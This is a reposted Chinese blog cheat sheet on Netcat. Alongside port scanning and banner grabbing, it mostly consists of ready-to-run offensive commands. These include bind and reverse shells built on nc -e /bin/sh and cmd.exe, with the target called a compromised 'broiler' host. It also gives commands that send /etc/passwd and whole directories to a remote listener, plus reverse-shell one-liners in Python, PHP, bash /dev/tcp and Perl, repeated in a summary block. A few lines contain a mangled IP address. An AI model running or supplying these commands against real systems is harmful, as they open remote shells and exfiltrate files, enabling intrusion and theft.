当前位置:   article > 正文

NetCat 工具的常用使用技巧_windows nc -vv -l

windows nc -vv -l

Netcat,通常简称为nc,是一种网络工具,用于在计算机网络上传输数据。它可以用于多种网络任务,包括端口扫描、数据传输、端口监听和网络调试等。Netcat是一款强大的命令行工具,因其灵活性和功能而受到网络管理员和安全专家的欢迎。

NC反弹

  1. 1:正向连接
  2. 服务器执行:nc -l -p 8888 -e cmd.exe
  3. 本地主机执行:nc -vv 服务器ip 8888
  4. 2:反向连接
  5. 服务器执行:nc -e cmd.exe 公网ip 8888
  6. 公网主机执行:nc -lvp 8888

帮助信息

  1. [root@localhost ~]# nc -help
  2. -g <网关> 设置路由器跃程通信网关,最多可设置8个;
  3. -G <指向器数目> 设置来源路由指向器,其数值为4的倍数;
  4. -h 在线帮助;
  5. -i <延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口;
  6. -l 使用监听模式,管控传入的资料;
  7. -n 直接使用IP地址,而不通过域名服务器;
  8. -o <输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;
  9. -p <通信端口> 设置本地主机使用的通信端口;
  10. -r 乱数指定本地与远端主机的通信端口;
  11. -s <来源位址> 设置本地主机送出数据包的IP地址;
  12. -u 使用UDP传输协议;
  13. -v 显示指令执行过程;
  14. -w <超时秒数> 设置等待连线的时间;
  15. -z 使用0输入/输出模式,只在扫描通信端口时使用。

远程端口探测

连接远程主机的80端口,并获取到该端口的版本信息

lyshark@dell:~$ nc -nv 192.168.1.20 80

实现快速端口扫描

扫描目标主机开放的端口,例如从 70-100 那个端口是开放的

  1. lyshark@dell:~$ nc -nvv -w2 -z 192.168.1.20 70-100 TCP扫描
  2. lyshark@dell:~$ nc -nvv -w2 -z -u 192.168.1.20 70-100 UDP扫描

正向连接 

正向连接,创建正向连接

  1. [root@localhost ~]# nc -l -p 9999 -e /bin/sh 肉鸡执行
  2. lyshark@dell:~$ nc -nv 192.168.1.20 9999 服务端执行

反向连接

反向连接,推荐使用

[root@localhost ~]# nc -t -e /bin/sh 192.168.1.2 9999

服务端执行 nc -l -p 9999

远程传输文件

  1. [root@localhost ~]# nc 192.168.1.2 9999 < /etc/passwd
  2. lyshark@dell:~/w$ nc -l 9999 > passwd.log

远程传输目录

  1. lyshark@dell:~/w$ nc -l 9999 | tar xzvf -
  2. [root@localhost etc]# tar -czf - * | nc 192.168.1.2 9999

反弹端口

  1. [root@localhost ~]# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  2. lyshark@dell:~$ nc -lvp 9999

其他反弹端口

  1. php -r '$sock=fsockopen("192.168.1.2",9999);exec("/bin/sh -i <&3 >&3 2>&3");' php 反弹
  2. bash -i>&/dev/tcp/192.168.1。2/9999 0>&1 bash 反弹
  3. perl -e 'use Socket;$i="192.168.1。2";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl反弹

  1. # 连接远程主机的80端口,并获取到该端口的版本信息
  2. lyshark@dell:~$ nc -nv 192.168.1.20 80
  3. # 扫描目标主机开放的端口,从70-100 那个端口是开放的
  4. lyshark@dell:~$ nc -nvv -w2 -z 192.168.1.20 70-100 TCP扫描
  5. lyshark@dell:~$ nc -nvv -w2 -z -u 192.168.1.20 70-100 UDP扫描
  6. # 正向连接,创建正向连接,无法过墙
  7. [root@localhost ~]# nc -l -p 9999 -e /bin/sh 肉鸡执行
  8. lyshark@dell:~$ nc -nv 192.168.1.20 9999 服务端执行
  9. # 反向连接
  10. [root@localhost ~]# nc -t -e /bin/sh 192.168.1.2 9999
  11. lyshark@dell:~$ nc -l -p 9999
  12. #远程传输文件
  13. [root@localhost ~]# nc 192.168.1.2 9999 < /etc/passwd
  14. lyshark@dell:~/w$ nc -l 9999 > passwd.log
  15. # 远程传输目录
  16. lyshark@dell:~/w$ nc -l 9999 | tar xzvf -
  17. [root@localhost etc]# tar -czf - * | nc 192.168.1.2 9999
  18. # Python 反弹nc端口
  19. [root@localhost ~]# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  20. lyshark@dell:~$ nc -lvp 9999
  21. # 其他反弹端口
  22. php -r '$sock=fsockopen("192.168.1.2",9999);exec("/bin/sh -i <&3 >&3 2>&3");' php 反弹
  23. bash -i>&/dev/tcp/192.168.1。2/9999 0>&1 bash 反弹
  24. perl -e 'use Socket;$i="192.168.1。2";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl反弹
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/194681
推荐阅读
相关标签
  

闽ICP备14008679号